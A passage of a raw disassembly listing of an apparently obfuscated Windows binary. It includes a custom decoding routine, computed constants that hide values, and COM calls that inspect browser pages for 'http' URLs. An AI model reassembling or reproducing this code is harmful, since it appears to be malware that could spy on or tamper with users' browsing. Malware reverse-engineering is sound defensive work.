dd 203F1A3Fh, 463F2D3Fh, 603F4C3Fh, 6D3F663Fh, 0A53F8A3Fh
dd 0C13FAB3Fh, 0E23FDC3Fh, 3FF53Fh, 900000h, 1D000h, 16301000h
dd 44302930h, 54304A30h, 9F309230h, 0DB30C730h, 0F530EF30h
dd 43310B30h, 61314931h, 86317731h, 96318D31h, 0A5319D31h
dd 0BF31B831h, 0E331D131h, 42323931h, 84327D32h, 0D332AD32h
dd 0E632D932h, 0FC32F532h, 32330C32h, 47334033h, 71335933h
dd 94338433h, 0AC339A33h, 0C133B233h, 0E733D733h, 33F933h
dd 2C341A34h, 40343834h, 5B345534h, 9E346134h, 0BB34B534h
dd 0DB34CD34h, 634FF34h, 35352235h, 52353E35h, 78356A35h
dd 0A1358035h, 0E735D535h, 0F835F235h, 0F360435h, 1F361736h
dd 33362536h, 63365A36h, 7C367636h, 0A5369E36h, 0DD36C336h
dd 0F136E236h, 1536F936h, 33372437h, 48374337h, 78375737h
dd 0A0378337h, 0C137A637h, 0D537C637h, 8380237h, 27381838h
dd 4C383538h, 66385838h, 8E388038h, 0B0389738h, 0EC38D038h
dd 12390B38h, 48394239h, 8A398339h, 9F399839h, 0C739B439h
dd 0ED39DA39h, 539FC39h, 413A253Ah, 5F3A553Ah, 8E3A653Ah
dd 0B53AAF3Ah, 0CB3AC53Ah, 0DD3AD83Ah, 143AE93Ah, 463B313Bh
dd 5D3B503Bh, 773B623Bh, 0B13B853Bh, 0D53BC23Bh, 0EE3BE93Bh
dd 0B3C013Bh, 1E3C113Ch, 3A3C243Ch, 523C463Ch, 763C683Ch
dd 913C843Ch, 9C3C963Ch, 0B83CAC3Ch, 0DD3CBF3Ch, 0FD3CE43Ch
dd 1D3D043Ch, 4D3D243Dh, 5F3D5A3Dh, 753D683Dh, 803D7A3Dh
dd 953D883Dh, 0A03D9B3Dh, 0D03DBF3Dh, 0F73DE33Dh, 0F3DFC3Dh
dd 1F3E193Eh, 403E2C3Eh, 773E6A3Eh, 9C3E7C3Eh, 0C53EA33Eh
dd 0D53ECE3Eh, 0E03EDB3Eh, 0FF3EF93Eh, 273F1C3Eh, 6F3F653Fh
dd 823F7C3Fh, 0B43F943Fh, 0E83FCA3Fh, 0A0003Fh, 10800h
dd 52303300h, 65305B30h, 86307F30h, 1F30BA30h, 59312631h
dd 6F316031h, 83317531h, 95318E31h, 0B9327F31h, 0E132CD32h
dd 0F532E732h, 0D933B332h, 18341033h, 67346034h, 7E347734h
dd 98349134h, 0B834A934h, 0D034BE34h, 0E634D634h, 81356034h
dd 0D8358835h, 62365C35h, 0CD36A736h, 3B372E36h, 6E374037h
dd 83377D37h, 0A3378D37h, 0F737D437h, 1537FD37h, 31382A38h
dd 7A384B38h, 87388138h, 0BE38B438h, 2238CE38h, 42392939h
dd 5B395539h, 74396E39h, 0A0399339h, 0D139BB39h, 193A0E39h
dd 8C3A863Ah, 0A83A9A3Ah, 0C93AC23Ah, 0E13ADB3Ah, 0F53AEF3Ah
dd 2C3B1A3Ah, 4E3B3B3Bh, 7A3B713Bh, 0E03B8A3Bh, 173C103Bh
dd 903C5D3Ch, 0A3C973Ch, 2A3D103Dh, 583D313Dh, 773D5E3Dh
dd 983D7D3Dh, 0B53DAF3Dh, 0DD3DD13Dh, 4F3DE33Dh, 8F3E563Eh
dd 283F1E3Eh, 3A3F343Fh, 4C3F463Fh, 3F993Fh, 0B00000h
dd 0C800h, 55304100h, 6A306430h, 8D307C30h, 0A9309430h
dd 0C830C130h, 0F030DC30h, 46313130h, 5F314E31h, 71316631h
dd 9A317831h, 0B531A031h, 0DE31CD31h, 0FE31E531h, 18320531h
dd 38321F32h, 61324A32h, 9C326732h, 0B832B232h, 0D032CA32h
dd 0DF32D932h, 1E330E32h, 57333E33h, 77335D33h, 94337E33h
dd 0AA33A333h, 0E333C233h, 0F833EF33h, 17340A33h, 33342A34h
dd 5F345334h, 8F347834h, 0BE34A834h, 0D734C834h, 0F334DD34h
dd 12350034h, 3C351935h, 82356835h, 9C359135h, 0C035B635h
dd 235E335h, 96362036h, 0A6369E36h, 0AF36AE36h, 0BE3EB63Eh
dd 0BA3EC63Eh, 0D23FC63Fh, 0EA3FDE3Fh, 3FF63Fh, 0C00000h
dd 1400h, 0E300200h, 26301A30h, 303230h, 1300000h, 4400h
dd 0BC300000h, 58335432h, 60335C33h, 68336433h, 74336C33h
dd 7C337833h, 84338033h, 8C338833h, 98339033h, 0A0339C33h
dd 0A833A433h, 0B033AC33h, 0B833B433h, 0C037BC37h, 37C437h
dd 1500000h, 2000h, 98319400h, 0AC319C31h, 0B431B031h
dd 0BC31B831h, 0C431C031h, 31C831h, 5Fh dup(0)
dd 7587C100h, 46h, 1802800h, 3 dup(100h), 1803400h, 1803800h
dd 1803C00h, 716B6B00h, 2E5F7876h, 6C6C64h, 983E00h, 1804000h
dd 0
dd 694C5F00h, 69614D62h, 30406Eh, 90h dup(0)
dd 7587C100h, 46h, 1802800h, 3 dup(100h), 1803400h, 1803800h
dd 1803C00h, 716B6B00h, 2E5F7876h, 6C6C64h, 983E00h, 1804000h
dd 0
dd 694C5F00h, 69614D62h, 30406Eh, 4448h dup(0)
_data ends
; ---------------------------------------------------------------------------
; Section 4. (virtual address 00038000)
; Virtual size : 0000B03C ( 45116.)
; Section size in file : 0000B03C ( 45116.)
; Offset to raw data for section: 00038000
; Flags 60000020: Text Executable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 438000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_438006: ; DATA XREF: sub_438026+A�o
xor eax, eax
inc eax
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
jz short locret_438025
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_438025: ; CODE XREF: .text:00438014�j
retn
; =============== S U B R O U T I N E =======================================
sub_438026 proc near ; CODE XREF: .text:0043814E�p
; .text:0043817C�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_438006
push large dword ptr fs:0
mov large fs:0, esp
loc_438043: ; CODE XREF: sub_438026+44�j
; sub_438026+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_438072
cmp esi, [esp+1Ch+arg_4]
jz short loc_438072
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_438043
call dword ptr [ebx+esi*4+8]
jmp short loc_438043
; ---------------------------------------------------------------------------
loc_438072: ; CODE XREF: sub_438026+2A�j
; sub_438026+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_438026 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438080 proc near ; CODE XREF: .text:00438141�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_438098
push [ebp+arg_0]
call sub_442FD0
loc_438098: ; DATA XREF: sub_438080+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_438080 endp
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_438175
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4380D3: ; CODE XREF: .text:0043816C�j
cmp esi, 0FFFFFFFFh
jz loc_438184
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_438163
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword_44A034, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword_44A038, eax
mov eax, [edx+4]
mov dword_44A03C, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_44A040
mov esi, dword_44A038
rep movsd
lea edi, dword_44A040
mov dword_44A038, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_438163
js short loc_438171
mov edi, [ebx+8]
push ebx
call sub_438080
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_438026
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_438163: ; CODE XREF: .text:004380E4�j
; .text:00438139�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4380D3
; ---------------------------------------------------------------------------
loc_438171: ; CODE XREF: .text:0043813B�j
xor eax, eax
jmp short loc_43818E
; ---------------------------------------------------------------------------
loc_438175: ; CODE XREF: .text:004380B8�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_438026
add esp, 0Ch
loc_438184: ; CODE XREF: .text:004380D6�j
push 0Bh
call sub_443018
add esp, 4
loc_43818E: ; CODE XREF: .text:00438173�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_4381A7
call sub_4381C3
loc_4381A7: ; CODE XREF: .text:004381A0�j
call sub_442F5B
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, off_44A000
call eax ; sub_442F30
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4381C3 proc near ; CODE XREF: .text:004381A2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_442FE8
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_442FE8
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_442FE8
mov [ebp+var_C], eax
push (offset aWr+2)
push [ebp+var_8]
call sub_442FDC
mov dword_44A008, eax
push offset aWr ; "wr"
push [ebp+var_4]
call sub_442FDC
mov dword_44A004, eax
push offset aWr ; "wr"
push [ebp+var_C]
call sub_442FDC
add esp, 30h
mov dword_44A00C, eax
mov edi, dword_44A004
or edi, edi
jz short loc_43823C
push 0
push edi
call sub_443024
add esp, 8
loc_43823C: ; CODE XREF: sub_4381C3+6C�j
mov edi, dword_44A00C
or edi, edi
jz short loc_438256
push 0
push edi
call sub_443024
add esp, 8
call sub_43825C
loc_438256: ; CODE XREF: sub_4381C3+81�j
pop edi
leave
retn
sub_4381C3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43825C proc near ; CODE XREF: sub_4381C3+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_442FC4
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_438294
; ---------------------------------------------------------------------------
loc_438278: ; CODE XREF: sub_43825C+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_438280
inc [ebp+var_C]
loc_438280: ; CODE XREF: sub_43825C+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_438294: ; CODE XREF: sub_43825C+1A�j
cmp byte ptr [ebx], 0
jnz short loc_438278
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_44300C
pop ecx
mov [ebp+var_8], eax
mov dword_44A010, eax
cmp [ebp+var_8], 0
jnz short loc_4382C2
xor eax, eax
jmp short loc_43831F
; ---------------------------------------------------------------------------
loc_4382C2: ; CODE XREF: sub_43825C+60�j
mov ebx, [ebp+var_10]
jmp short loc_43830C
; ---------------------------------------------------------------------------
loc_4382C7: ; CODE XREF: sub_43825C+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_438306
push [ebp+var_4]
call sub_44300C
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_4382F4
jmp short loc_43831F
; ---------------------------------------------------------------------------
loc_4382F4: ; CODE XREF: sub_43825C+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_443030
add esp, 8
add [ebp+var_8], 4
loc_438306: ; CODE XREF: sub_43825C+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43830C: ; CODE XREF: sub_43825C+69�j
cmp byte ptr [ebx], 0
jnz short loc_4382C7
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_43831F: ; CODE XREF: sub_43825C+64�j
; sub_43825C+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_43825C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438324 proc near ; CODE XREF: sub_43C2C0+C1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
movsx eax, word_44A1F0
add eax, dword_44A284
sub eax, 0Ch
push eax
push [ebp+arg_0]
call ds:dword_448634 ; VirtualFree
pop ebp
retn
sub_438324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438348 proc near ; CODE XREF: sub_43AF47+1A4�p
; sub_43AF47+259�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
movsx eax, word_44A1FC
add eax, dword_44A108
sub eax, 0Bh
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_438486
; ---------------------------------------------------------------------------
loc_43837C: ; CODE XREF: sub_438348+146�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, dword_44A3B8[edx]
mov eax, dword_44A090
movsx edx, word_44A0E0
add eax, edx
sub eax, 3
neg eax
cmp esi, eax
jz loc_438485
mov eax, [ebp+var_8]
or eax, eax
jl loc_438482
cmp eax, 3
jg loc_438482
jmp off_44A7B8[eax*4]
loc_4383BF: ; DATA XREF: .data:off_44A7B8�o
inc [ebp+var_8]
jmp loc_438482
; ---------------------------------------------------------------------------
loc_4383C7: ; CODE XREF: sub_438348+70�j
; DATA XREF: .data:0044A7BC�o
mov edx, [ebp+var_C]
mov ecx, dword_44A158
add ecx, dword_44A0A8
sub ecx, 0Dh
mov eax, edx
shl eax, cl
mov [ebp+var_18], eax
mov edx, esi
and edx, 30h
mov ecx, dword_44A278
movsx eax, word_44A170
add ecx, eax
mov eax, edx
sar eax, cl
mov edx, [ebp+var_18]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_438482
; ---------------------------------------------------------------------------
loc_43840D: ; CODE XREF: sub_438348+70�j
; DATA XREF: .data:0044A7C0�o
mov edx, [ebp+var_C]
and edx, 0Fh
movsx ecx, word_44A1A4
sub ecx, 3
mov eax, edx
shl eax, cl
mov [ebp+var_1C], eax
mov edx, esi
and edx, 3Ch
mov ecx, dword_44A134
sub ecx, 6
mov eax, edx
sar eax, cl
mov edx, [ebp+var_1C]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_438482
; ---------------------------------------------------------------------------
loc_43844B: ; CODE XREF: sub_438348+70�j
; DATA XREF: .data:0044A7C4�o
mov edx, [ebp+var_C]
and edx, 3
movsx ecx, word_44A208
inc ecx
mov eax, edx
shl eax, cl
mov edx, eax
or edx, esi
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
movsx eax, word_44A144
movsx edx, word_44A1DC
add eax, edx
sub eax, 7
mov [ebp+var_8], eax
loc_438482: ; CODE XREF: sub_438348+61�j
; sub_438348+6A�j ...
mov [ebp+var_C], esi
loc_438485: ; CODE XREF: sub_438348+56�j
inc edi
loc_438486: ; CODE XREF: sub_438348+2F�j
cmp byte ptr [edi], 0
jz short loc_438494
cmp ebx, [ebp+var_4]
jb loc_43837C
loc_438494: ; CODE XREF: sub_438348+141�j
cmp byte ptr [edi], 0
jnz short loc_4384A0
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_4384B0
; ---------------------------------------------------------------------------
loc_4384A0: ; CODE XREF: sub_438348+14F�j
mov eax, dword_44A0E4
add eax, dword_44A090
sub eax, 0Bh
neg eax
loc_4384B0: ; CODE XREF: sub_438348+156�j
pop edi
pop esi
pop ebx
leave
retn
sub_438348 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4384B5 proc near ; CODE XREF: sub_43858C+68A�p
; sub_4393B1+EF�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4384CA: ; CODE XREF: sub_4384B5+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4384CA
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_4384DC: ; CODE XREF: sub_4384B5+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4384DC
mov esi, eax
movsx eax, word_44A118
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_43854D
; ---------------------------------------------------------------------------
loc_4384F4: ; CODE XREF: sub_4384B5+9E�j
mov eax, dword_44A184
movsx edx, word_44A100
mov ebx, eax
add ebx, edx
sub ebx, 5
mov eax, dword_44A1C8
mov edi, eax
add edi, dword_44A13C
sub edi, 3
jmp short loc_438546
; ---------------------------------------------------------------------------
loc_438519: ; CODE XREF: sub_4384B5+93�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_43854A
inc ebx
cmp ebx, esi
jnz short loc_438545
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_438545
mov eax, [ebp+var_4]
jmp short loc_43855A
; ---------------------------------------------------------------------------
loc_438545: ; CODE XREF: sub_4384B5+7E�j
; sub_4384B5+89�j
inc edi
loc_438546: ; CODE XREF: sub_4384B5+62�j
cmp edi, esi
jb short loc_438519
loc_43854A: ; CODE XREF: sub_4384B5+79�j
inc [ebp+var_4]
loc_43854D: ; CODE XREF: sub_4384B5+3D�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_4384F4
mov eax, 0FFFFh
loc_43855A: ; CODE XREF: sub_4384B5+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_4384B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43855F proc near ; DATA XREF: sub_439B7B+145�o
push ebp
mov ebp, esp
loc_438562: ; CODE XREF: sub_43855F+27�j
call sub_43C073
mov eax, dword_44A18C
add eax, 2
mov edx, dword_44A280
add edx, 0EA5Ch
imul eax, edx
push eax
call ds:dword_449630
pop ecx
jmp short loc_438562
sub_43855F endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43858C proc near ; CODE XREF: sub_440EE8+29�p
var_71F10 = dword ptr -71F10h
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF9 = byte ptr -70EF9h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50E9D = byte ptr -50E9Dh
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_442F6C
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call ds:dword_444038
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
movsx eax, word_44A16C
movsx edx, word_44A180
add eax, edx
sub eax, 5
push eax
push [ebp+arg_0]
call ds:dword_447254
mov ebx, eax
movsx eax, word_44A0C0
movsx edx, word_44A1B4
add eax, edx
sub eax, 6
cmp ebx, eax
jnz loc_439355
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push offset dword_44BAD8
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A26C
sub eax, 9
cmp ebx, eax
jnz loc_439355
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov eax, dword_44A224
sub eax, 5
cmp ebx, eax
jnz loc_439349
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_43C434
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call ds:dword_449BA0
cmp [ebp+var_40E57], 68h
jnz short loc_4386A7
cmp [ebp+var_40E56], 74h
jnz short loc_4386A7
cmp [ebp+var_40E55], 74h
jnz short loc_4386A7
cmp [ebp+var_40E54], 70h
jz short loc_4386AC
loc_4386A7: ; CODE XREF: sub_43858C+FE�j
; sub_43858C+107�j ...
jmp loc_439349
; ---------------------------------------------------------------------------
loc_4386AC: ; CODE XREF: sub_43858C+119�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
mov eax, dword_44A204
add eax, dword_44A0DC
sub eax, 4
cmp ebx, eax
jz short loc_4386DD
and [ebp+var_30E4C], 0
loc_4386DD: ; CODE XREF: sub_43858C+148�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, dword_44A28C
add eax, dword_44A274
sub eax, 7
cmp ebx, eax
jnz loc_439349
lea eax, [ebp+var_40E6C]
push eax
push offset dword_44BA58
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A268
sub eax, 4
cmp ebx, eax
jnz loc_43933D
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov eax, dword_44A204
dec eax
cmp ebx, eax
jnz loc_439331
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word_44A170
sub eax, 2
cmp ebx, eax
jnz loc_439325
mov eax, dword_44A128
sub eax, 8
neg eax
mov [ebp+var_40E5C], eax
push offset dword_44B9A0
call sub_43F767
push eax
call ds:dword_444044
mov [ebp+var_30E44], eax
push offset dword_44B990
call sub_43F767
add esp, 8
push eax
call ds:dword_444044
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_442F8C
loc_4387D4: ; CODE XREF: sub_43858C+D6D�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
mov eax, dword_44A194
sub eax, 8
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_43883F
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44A1D0
add eax, dword_44A284
sub eax, 10h
cmp ebx, eax
jnz loc_4392E7
push offset byte_44B981
call sub_43C507
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_444020
add esp, 0Ch
jmp loc_438947
; ---------------------------------------------------------------------------
loc_43883F: ; CODE XREF: sub_43858C+266�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push offset dword_44BAA8
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A1E8
dec eax
cmp ebx, eax
jnz loc_4392E7
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, dword_44A0B4
sub eax, 8
cmp ebx, eax
jz short loc_4388D4
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_4392E7
; ---------------------------------------------------------------------------
loc_4388D4: ; CODE XREF: sub_43858C+335�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44A21C
sub eax, 8
cmp ebx, eax
jz short loc_438912
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_4392E7
; ---------------------------------------------------------------------------
loc_438912: ; CODE XREF: sub_43858C+367�j
push offset word_44B972
call sub_43C507
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_449634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_444020
add esp, 18h
loc_438947: ; CODE XREF: sub_43858C+2AE�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, dword_44A268
sub eax, 4
cmp ebx, eax
jnz loc_4392E7
movsx eax, word_44A240
movsx edx, word_44A0CC
add eax, edx
sub eax, 9
mov [ebp+var_30E50], eax
jmp loc_4392D5
; ---------------------------------------------------------------------------
loc_43898A: ; CODE XREF: sub_43858C+D55�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
movsx eax, word_44A0C0
mov edx, dword_44A14C
sub edx, 6
mov [ebp+eax+var_50E9D], dl
